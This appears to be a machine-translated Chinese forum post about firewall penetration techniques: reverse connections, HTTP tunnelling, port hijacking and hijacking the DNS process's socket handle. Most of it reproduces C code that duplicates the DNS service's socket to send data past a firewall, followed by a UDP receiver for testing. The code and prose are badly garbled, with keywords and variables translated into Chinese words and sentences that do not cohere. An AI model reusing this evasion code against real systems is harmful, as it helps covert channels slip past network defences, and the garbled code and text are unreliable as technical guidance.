对几种穿透防火墙技术2（Several penetration firewall technologies 2）

对几种穿透防火墙技术2（Several penetration firewall technologies 2） 对几种穿透防火墙技术2(Several penetration firewall technologies 2) D0000D sent to the forum ------------------------------------------------------- No2 plate technical articles D8888D post title ------------------------------------------------------- Several penetration firewall technologies D8888D new content ------------------------------------------------------- Here are some notes and some ideas about several penetration techniques: The firewall is one of the basic network security strategy, it can prevent the external network users do not trust access to the internal network users, if the communication between the users of the network with the user initiated by the users of the network, communication is usually firewall blocking, especially for the TCP connection is sensitive, so if we can guarantee the normal data transmission. Especially the non active connection situation, how to ensure safety and stability of connection and data communication? People use penetration firewall technology (commonly used): 1. reverse connection request ------> initiated by the user, the X firewall rules, is to allow safe 2.HTTP tunnel technology ------> is to transfer all the data are encapsulated into Http protocol for transmission 3. port ------> multiplexing technology called port hijacking,. The principle is mainly to modify port attributes to achieve port binding. This technology is usually transformed by the host when accepting foreign packets, and then accepted by the user 4. sharing DNS socket handle ------> technology which is mainly used for the DNS service is all firewall immune function to achieve, and the characteristics of DNS technology or socket handle with UDP communication (back through some code references to illustrate ZwelL) Today we focus on several combinations of penetration firewall technology 1. reverse connect with HTTP tunneling technology A reverse connection is a connection request initiated by an internal network user that is legal under the firewall rule and assumes that there is a program S, C The S----> proxy ------>C server program s initiates the C connection request from the internal network and gets the corresponding IP and port through the proxy server <----- (IP, port) to establish socket socket, set the port number: 8080 - ============ =========== when C/S connection is established, the time for data transmission, this time we use the HTTP tunnel technology, all the data to be transmitted after HTTP protocol encapsulation, add a HTTP request header: "Get/HTTP/1.0\r\nUse-Agent:Molliza/1.22\r\nAccept:*/*\r\n\r\n", at the same time in the data add $$marker, users in the received program data according to the preset mark data segment is found, the removal of HTTP request header, then the data were processed by reverse connection +HTTP tunnel technology also has many limitations with the port number 1. for the 802. data transmission using HTTP tunnel to encapsulation of data by HTTP the program, fully guarantee the integrity and security of the data in the HTTP tunnel can not be confused, the data The release is also some need to consider the issue of the 3. data collection tools and tools like IS can be detected in 4. The firewall is not a fool, so it is not by the rules by the us to change how you can do, we hope is to make the S program for us to do a third party automatic port mapping, while the third is the stability of our.......... 2. share this technology DNS technology socket handle everyone in 05 when it should be heard, it was published in an ZwelL focus on an article "a new firewall penetration technology which uses is the use of DNS services is UDP communication and all firewall could not reject...... this technique uses the API function. The process of win terminal services provided by the library about: The wstapi provides a function to enumerate all system processes -----> search target process or target service process -----> recording process PID------> using the PID socket handle ball socket communication to create ============ implementation code: the following ZwelL cited a... Blocked code. /*++ Made By ZwelL [url=:zwell@sohu.com] link tag zwell@sohu.com[/url] 2005.4.12 --*/ #include #include #include #pragma comment (LIB, "ws2_32") #pragma comment (LIB, "wtsapi32") #define NT_SUCCESS (status) ((NTSTATUS) (status) >=0) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004L) Typedef LONG NTSTATUS; Typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG ProcessId; UCHAR ObjectTypeNumber; UCHAR Flags; USHORT Handle; PVOID Object; ACCESS_MASK GrantedAccess; } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; Typedef, ULONG (WINAPI, *ZWQUERYSYSTEMINFORMATION) (ULONG, PVOID, ULONG, PULONG); ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL; BOOL LocateNtdllEntry (void) { BOOL RET = FALSE; Char NTDLL_DLL[] = "ntdll.dll""; HMODULE ntdll_dll = NULL; If ((ntdll_dll = GetModuleHandle (NTDLL_DLL)) = = NULL) { Printf ("GetModuleHandle () failed"); Return (FALSE); } If ((= ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION) GetProcAddress (ntdll_dll, ZwQuerySystemInformation)) { Goto LocateNtdllEntry_exit; } RET = TRUE; LocateNtdllEntry_exit: If (FALSE = RET) { printf ("getprocaddress () failed"); } ntdll _ teach = null; return (right); } / * + + this routine is used to get a process's username from it's sid - * / all getusernamefromsid (psid pusersid, char * szusername) { / / sanity checks and default value if (pusersid = = null) return false; strcpy (szusername, "?") ; sid _ name _ use cunning; tchar szuser [_ max _ path]; dword chuser = _ max _ path; pdword pcchuser = & chuser; tchar szdomain [_ max _ path]; dword chdomain = _ max _ path; pdword pcchdomain = & chdomain; / / retrieve user name and domain name based on user's sid. if ( :: lookupaccountsid ( null, pusersid, szuser, pcchuser, szdomain, pcchdomain, & sly ) ) { wsprintf (szusername, "% s", szuser); } else { return false; } return true; } / * + + this routine is used to get the dns process' s id here, i use wtsenumerateprocesses get process user sid, and then get the process user name. beacause as it 's a "network service" we cann 't use openprocesstoken two catch the dns process's token information even if we has the privilege in catching the system 's. - * / dword getdnsprocessid () { pwts _ process _ info pprocessinfo = null; dword processcount = 0; char szusername [255]; dword id = - 1; if (wtsenumerateprocesses (wts _ current _ server _ act, 0, 1, & pprocessinfo, & processcount)) { / / dump each process description for (dword currentprocess = 0; currentprocess < processcount; currentprocess + +) { if (strcmp (pprocessinfo [currentprocess].pprocessname, "svchost.exe") = = 0) { getusernamefromsid (pprocessinfo [currentprocess].pusersid, szusername); if (strcmp (szusername, "network service") = = 0) { ID = pprocessinfo [ currentprocess processid ]; 打破; } } } WTSFreeMemory(pprocessinfo); } 返回ID; } / + + 这并不工作，我们知道，标志„ 但你可以用常规的其他用途„ - * / / * 布尔getprocessuserfromid(char * szaccountname，DWORD PID) { 处理hprocess = null， haccesstoken = null; szdomainname TCHAR infobuffer [ 1000 ]，[ 200 ]; ptoken_user ptokenuser =(ptoken_user)infobuffer; DWORD dwinfobuffersize，dwaccountsize = 200，dwdomainsize = 200; sid_name_use SNU; hprocess = OpenProcess(process_query_information，虚假，PID); 如果(hprocess = = null) { printf(“OpenProcess错”); CloseHandle(hprocess); 返回false; } 如果(0 = =(hprocess OpenProcessToken，token_query，与haccesstoken)) { printf(“OpenProcessToken错误%08x”，getlasterror()); 返回false; } gettokeninformation(haccesstoken，tokenuser，infobuffer， 1000、与dwinfobuffersize); lookupaccountsid(null，ptokenuser -> User.Sid，szaccountname， 与dwaccountsize，szdomainname，与dwdomainsize，与SNU); 如果(hprocess) CloseHandle(hprocess); 如果(haccesstoken) CloseHandle(haccesstoken); 返回true; } /* / + + 现在，这是最重要的东西„^ _ ^ - * / 插座getsocketfromid(DWORD PID) { NTSTATUS状态; PVOID buf = null; 页大小= 1; 页numofhandle = 0; 页我; psystem_handle_information h_info = null; 句柄=空; 的DWORD值n; buf = malloc(0x1000); 如果(buf = = null) { printf(“malloc错误\n”); 返回null; } 状态= zwquerysysteminformation(0x10，buf，0x1000，& n); 如果(status_info_length_mismatch = =状态) { 免费(BUF); buf = malloc(N); 如果(buf = = null) { printf(“malloc错误\n”); 返回null; } 状态= zwquerysysteminformation(0x10，buf，N，null); } 其他的 { printf(“zwquerysysteminformation错\n”); 返回null; } numofhandle = *(ULONG *)buf; h_info =(psystem_handle_information)((ULONG)缓冲区+ 4); 为(i = 0;i < numofhandle;i++) { 尝试 { 如果(h_info.processid = =(PID)和(h_info.objecttypenumber = = 0x1c) &(h_info.handle～= 0x2c)/ /我不知道为什么如果手柄等于0x2c， 在我的测试中，它停在getsockname() /所以我跳过了这种情况„ /可能在您的系统中有所不同， )/ wind2000是0x1a { // printf(“处理:0x%x类型:%08x \n”，h_info.handle，h_info。 objecttypenumber); 如果(0 = = DuplicateHandle( OpenProcess(process_all_access，真实，PID)， (处理)h_info.handle， getcurrentprocess()， 与袜子， standard_rights_required， 真正的， duplicate_same_access) ) { printf(“复制对象句柄否是是错误的:% 8x”，getlasterror()); 继续; } // printf(“复制对象句柄否是是好\n”); sockaddr_in名称= { 0 }; name.sin_family = af_inet; namelen = sizeof(int sockaddr_in); getsockname((插座)的袜子，(知道为什么)和名称，与namelen); // printf(“口= % 5d的\“，ntohs(name.sin_port)); 如果(ntohs(名字。sin_port)> 0)//如果端口> 0，那么我们可以用它 打破; } } 抓住(„) { 继续; } } 如果(BUF～= null) { 免费(BUF); } 回(插座)袜; } / + + 这不是必需的„ - * / 布尔enableprivilege(pcstr名称) { 处理htoken; 布尔RV; token_privileges宅院{ 1 } }，{ 0, 0，se_privilege_enabled; LookupPrivilegeValue( 0， 名称， 与priv.privileges流[ 0 ]。 ); priv.privileges属性= se_privilege_enabled [ 0 ]; OpenProcessToken( getcurrentprocess()， token_adjust_privileges， 与htoken ); AdjustTokenPrivileges( htoken， 假， 与私法， 规模化， 0， 零 ); RV = GetLastError()= = error_success; CloseHandle(htoken); 返回房车; } 无效main() { wsadata wsadata; 焦testbuf [ 255 ]; 插座的袜子; sockaddr_in recvaddr; int iResult = WSAStartup(makeword(2,2)，与wsadata); 如果(iResult～= no_error) printf(“错误wsastartup() \n”); 如果(～locatentdllentry()) 返回; 如果(～enableprivilege(se_debug_name)) { printf(“enableprivilege错\n”); 返回; } 袜子= getsocketfromid(getdnsprocessid()); 如果(袜子= NULL) { printf(“getsocketfromid错\n”); 返回; } /更改值„ recvaddr.sin_family = af_inet; recvaddr.sin_port = htons(5555); recvaddr.sin_addr.s_addr = inet_addr(“127.0.0.1”); 如果(socket_error = = sendto(袜子， “测试”， 5， 0， (不知道为什么)和recvaddr， sizeof(recvaddr))) { printf(“sendto错:%d\n”，wsagetlasterror()); } 其他的 { printf(“送好„玩得开心，对吧,^ _ ^ \n”); } getchar(); / / wsacleanup(); 返回; } 很早以前我就有这个想法了，只是一直没有去实现。在上面的代码中， 因为要找出DNS进程句柄，而svchost. exe又有多个，所以以用户名来进行判断，本来是用OpenProcessToken， 但是怎么也不行，所以换个方法用到了wtsapi32库函数。 再用下面的代码测试: / + + udpreceiver - * / #包括< stdio. h > #包括“Winsock2。” #语用评论(库， “ws2_32”) 无效main() { wsadata wsadata; 插座recvsocket; sockaddr_in recvaddr; int端口= 5555; 焦recvbuf [ 1024 ]; int缓冲区长度= 1024; sockaddr_in senderaddr; senderaddrsize = sizeof(int senderaddr); / / ----------------------------------------------- //初始化Winsock WSAStartup(makeword(2,2)，与wsadata); / / ----------------------------------------------- //创建一个接收器接收数据报套接字 recvsocket =插座(af_inet，sock_dgram，ipproto_udp); / / ----------------------------------------------- //将套接字绑定到任何地址和指定的端口。 recvaddr.sin_family = af_inet; recvaddr.sin_port = htons(港); recvaddr.sin_addr.s_addr = htonl(inaddr_any); 绑定(recvsocket，(不知道为什么)和recvaddr，sizeof(recvaddr)); / / ----------------------------------------------- //调用recvfrom函数接收数据报 在绑定套接字上。 printf(“接收数据报的„\n”); (1) { recvfrom(recvsocket， RecvBuf， BufLen， 0， (不知道为什么)和senderaddr， 与senderaddrsize); printf(“%s”，RecvBuf); } / / ----------------------------------------------- / /关闭套接字时完成接收数据报的 printf(“完成接收。关闭套接字“n”; closesocket(recvsocket); / / ----------------------------------------------- /清理和出口。 printf(“退出”); wsacleanup(); 返回; } =========================================================== 测试步骤: 1。在一台机器上执行udpreceiver， 2。在安装防火墙的机器上执行第一个程序。 以上就是我的学习笔记了，希望对你有帮助，目前正在组合一些大牛们的想法，正在思考一种新的穿透防火墙的数据传输技术